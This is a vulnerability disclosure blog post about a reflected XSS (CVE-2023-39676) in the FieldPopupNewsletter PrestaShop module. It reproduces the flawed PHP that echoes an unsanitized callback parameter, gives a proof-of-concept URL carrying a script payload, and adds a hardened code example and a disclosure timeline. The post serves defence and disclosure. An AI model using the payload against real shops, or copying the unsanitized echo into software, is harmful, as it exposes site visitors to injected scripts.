
XSS in FieldPopupNewsletter Prestashop Module CVE-2023-39676

This blog post details an XSS we found within the FieldPopupNewsletter module, developed by FieldThemes, for the popular ecommerce platform Prestashop.

The module contains a file called ajax.php with the following code:

// ajax.php: the email comes from $_POST; the callback is read from $_GET inside the method
$ppp = new FieldPopupNewsletter();
echo $ppp->newsletterRegistration($_POST['email']);

The newsletterRegistration function, called by the ajax.php file, contains code that lacks proper input validation:

public function newsletterRegistration($email) {
    if (empty($email) || !Validate::isEmail($email)) {
        // $_GET['callback'] is echoed verbatim into the response
        echo $_GET['callback'] . '(' . json_encode(array('<p class="alert alert-danger">' . $this->l('Invalid email address.') . '</p>')) . ')';
        return;
    }
    // ... (remainder of the function not shown)
}

The callback GET parameter is printed to the page without sanitization, which makes it susceptible to XSS. One might think that the use of a POST parameter mitigates this vulnerability, but a closer reading shows otherwise: when $_POST['email'] isn't set, empty($email) is true, so the vulnerable branch runs on a plain GET request with no POST body at all.
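A hardened form of the same branch, added here as an example (it is not the module's or FieldThemes' code): the callback is accepted only if it is a plain JavaScript identifier, the response is sent with a script or JSON content type instead of text/html, and the error text is carried as JSON rather than HTML. The helper names and the use of filter_var() in place of PrestaShop's Validate::isEmail() are assumptions made so the snippet runs stand-alone.

```php
<?php
// Added example, not the module's code. safeCallbackName(), sendNewsletterError()
// and newsletterRegistrationHardened() are hypothetical names.

// Accept only a dotted JavaScript identifier such as "cb123" or "app.onResult".
// Anything else, including "<script>alert(0)</script>", is rejected (null).
function safeCallbackName(?string $cb): ?string
{
    if ($cb === null || $cb === '' || strlen($cb) > 64) {
        return null;
    }
    $ident = '[A-Za-z_$][A-Za-z0-9_$]*';
    return preg_match('/^' . $ident . '(\.' . $ident . ')*$/', $cb) === 1 ? $cb : null;
}

// Build the body as JSONP only when the callback validated, otherwise as plain
// JSON. JSON_HEX_* keeps "<", ">", "&" and quotes escaped inside the payload,
// and the headers stop the browser from sniffing the body as HTML.
function sendNewsletterError(string $message, ?string $rawCallback): string
{
    $flags   = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $payload = json_encode(['error' => $message], $flags);
    $cb      = safeCallbackName($rawCallback);
    if (!headers_sent()) {
        header('X-Content-Type-Options: nosniff');
        header('Content-Type: ' . ($cb !== null
            ? 'application/javascript; charset=utf-8'
            : 'application/json; charset=utf-8'));
    }
    // The "/**/" prefix is the usual JSONP guard against content-type confusion.
    return $cb !== null ? '/**/' . $cb . '(' . $payload . ');' : $payload;
}

// Same control flow as the vulnerable branch, but the callback is validated and
// the message is plain text for the client to render, not pre-built HTML.
function newsletterRegistrationHardened(?string $email, ?string $rawCallback): string
{
    if (empty($email) || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return sendNewsletterError('Invalid email address.', $rawCallback);
    }
    return json_encode(['ok' => true]);
}

// Constructed inputs mirroring the report: no email, with the PoC callback
// (rejected, plain JSON is returned) and with a benign callback (JSONP).
echo newsletterRegistrationHardened(null, '<script>alert(0)</script>'), PHP_EOL;
echo newsletterRegistrationHardened(null, 'handleNewsletter'), PHP_EOL;
```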

Proof of Concept

As a demonstration of the vulnerability, an attacker can craft a malicious URL, like the one shown below, to execute arbitrary JavaScript code on the target user’s browser:

http://localhost/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(0)%3C/script%3E

Conclusion

XSS vulnerabilities are serious security risks that can lead to unauthorized access, data theft, and other malicious activities. In the case of the FieldPopupNewsletter module, a lack of input validation exposes users to potential attacks.

We strongly advise users of this module to update to the latest patched version, which should address the XSS vulnerability.

Timeline

Date        Action
----------  ------------------------------------------
10/07/2023  Issue discovered during a pentest
12/07/2023  Issue reported to FieldThemes
29/07/2023  CVE requested from MITRE
28/08/2023  CVE-2023-39676 assigned
31/08/2023  Patch released
07/09/2023  Blog post and nuclei template released